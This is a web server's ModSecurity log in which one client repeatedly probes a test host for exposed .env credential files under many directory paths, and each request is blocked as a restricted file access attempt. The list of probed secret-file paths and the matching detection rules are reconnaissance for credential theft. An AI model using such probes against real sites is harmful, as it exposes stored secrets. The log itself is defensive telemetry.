[Mon Jan 26 21:24:20.922536 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aXfNdJ940sjFbKiNzmHyygAAAAA"]
[Mon Jan 26 21:24:20.970868 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aXfNdJ940sjFbKiNzmHyywAAAAA"]
[Mon Jan 26 21:24:20.971074 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aXfNdJ940sjFbKiNzmHyywAAAAA"]
[Mon Jan 26 21:24:20.971226 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aXfNdJ940sjFbKiNzmHyywAAAAA"]
[Mon Jan 26 21:24:22.486882 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aXfNdkvEoeB8THj2IAUKLgAAAAE"]
[Mon Jan 26 21:24:22.487181 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aXfNdkvEoeB8THj2IAUKLgAAAAE"]
[Mon Jan 26 21:24:22.487358 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aXfNdkvEoeB8THj2IAUKLgAAAAE"]
[Mon Jan 26 21:24:22.538698 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aXfNdkvEoeB8THj2IAUKLwAAAAE"]
[Mon Jan 26 21:24:22.538919 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aXfNdkvEoeB8THj2IAUKLwAAAAE"]
[Mon Jan 26 21:24:22.539089 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aXfNdkvEoeB8THj2IAUKLwAAAAE"]
[Mon Jan 26 21:24:23.091513 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aXfNd0vEoeB8THj2IAUKMAAAAAE"]
[Mon Jan 26 21:24:23.091737 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aXfNd0vEoeB8THj2IAUKMAAAAAE"]
[Mon Jan 26 21:24:23.091909 2026] [:error] [pid 1677410] [client 45.148.10.143:47922] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aXfNd0vEoeB8THj2IAUKMAAAAAE"]
[Mon Jan 26 21:24:29.956089 2026] [:error] [pid 1677415] [client 45.148.10.143:47932] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNfburDkJrBY-m6DzdEAAAAA8"]
[Mon Jan 26 21:24:29.956346 2026] [:error] [pid 1677415] [client 45.148.10.143:47932] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNfburDkJrBY-m6DzdEAAAAA8"]
[Mon Jan 26 21:24:29.956551 2026] [:error] [pid 1677415] [client 45.148.10.143:47932] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNfburDkJrBY-m6DzdEAAAAA8"]
[Mon Jan 26 21:24:35.702590 2026] [:error] [pid 1675794] [client 45.148.10.143:48664] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNgzsp5zRKVOBo1RPARQAAAA0"]
[Mon Jan 26 21:24:35.702825 2026] [:error] [pid 1675794] [client 45.148.10.143:48664] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNgzsp5zRKVOBo1RPARQAAAA0"]
[Mon Jan 26 21:24:35.703011 2026] [:error] [pid 1675794] [client 45.148.10.143:48664] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNgzsp5zRKVOBo1RPARQAAAA0"]
[Mon Jan 26 21:24:39.462604 2026] [:error] [pid 1664894] [client 45.148.10.143:48674] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNh4lnPSpEvTj8B1BMzgAAAAg"]
[Mon Jan 26 21:24:39.462848 2026] [:error] [pid 1664894] [client 45.148.10.143:48674] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNh4lnPSpEvTj8B1BMzgAAAAg"]
[Mon Jan 26 21:24:39.463053 2026] [:error] [pid 1664894] [client 45.148.10.143:48674] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aXfNh4lnPSpEvTj8B1BMzgAAAAg"]
[Mon Jan 26 21:24:45.988617 2026] [:error] [pid 1675793] [client 45.148.10.143:56488] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aXfNjarypnbEh-LOXYdW_wAAAAU"]
[Mon Jan 26 21:24:45.988888 2026] [:error] [pid 1675793] [client 45.148.10.143:56488] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aXfNjarypnbEh-LOXYdW_wAAAAU"]
[Mon Jan 26 21:24:45.989111 2026] [:error] [pid 1675793] [client 45.148.10.143:56488] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aXfNjarypnbEh-LOXYdW_wAAAAU"]
[Mon Jan 26 21:24:49.719207 2026] [:error] [pid 1675795] [client 45.148.10.143:56496] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aXfNkcoFpPNqzjNngInAbwAAAA4"]
[Mon Jan 26 21:24:49.719438 2026] [:error] [pid 1675795] [client 45.148.10.143:56496] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aXfNkcoFpPNqzjNngInAbwAAAA4"]
[Mon Jan 26 21:24:49.719619 2026] [:error] [pid 1675795] [client 45.148.10.143:56496] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aXfNkcoFpPNqzjNngInAbwAAAA4"]
[Mon Jan 26 21:24:58.983513 2026] [:error] [pid 1677409] [client 45.148.10.143:37900] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aXfNmp940sjFbKiNzmHyzAAAAAA"]
[Mon Jan 26 21:24:58.983777 2026] [:error] [pid 1677409] [client 45.148.10.143:37900] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aXfNmp940sjFbKiNzmHyzAAAAAA"]
[Mon Jan 26 21:24:58.983935 2026] [:error] [pid 1677409] [client 45.148.10.143:37900] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aXfNmp940sjFbKiNzmHyzAAAAAA"]
[Mon Jan 26 21:25:05.079916 2026] [:error] [pid 1677410] [client 45.148.10.143:33776] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aXfNoUvEoeB8THj2IAUKMQAAAAE"]
[Mon Jan 26 21:25:05.080141 2026] [:error] [pid 1677410] [client 45.148.10.143:33776] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aXfNoUvEoeB8THj2IAUKMQAAAAE"]
[Mon Jan 26 21:25:05.080313 2026] [:error] [pid 1677410] [client 45.148.10.143:33776] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aXfNoUvEoeB8THj2IAUKMQAAAAE"]
[Mon Jan 26 21:25:14.229301 2026] [:error] [pid 1675794] [client 45.148.10.143:58122] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aXfNqjsp5zRKVOBo1RPARgAAAA0"]
[Mon Jan 26 21:25:14.229562 2026] [:error] [pid 1675794] [client 45.148.10.143:58122] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aXfNqjsp5zRKVOBo1RPARgAAAA0"]
[Mon Jan 26 21:25:14.229724 2026] [:error] [pid 1675794] [client 45.148.10.143:58122] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aXfNqjsp5zRKVOBo1RPARgAAAA0"]
[Mon Jan 26 21:25:33.167043 2026] [:error] [pid 1675793] [client 45.148.10.143:46966] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aXfNvarypnbEh-LOXYdXAAAAAAU"]
[Mon Jan 26 21:25:33.167272 2026] [:error] [pid 1675793] [client 45.148.10.143:46966] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aXfNvarypnbEh-LOXYdXAAAAAAU"]
[Mon Jan 26 21:25:33.167430 2026] [:error] [pid 1675793] [client 45.148.10.143:46966] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aXfNvarypnbEh-LOXYdXAAAAAAU"]
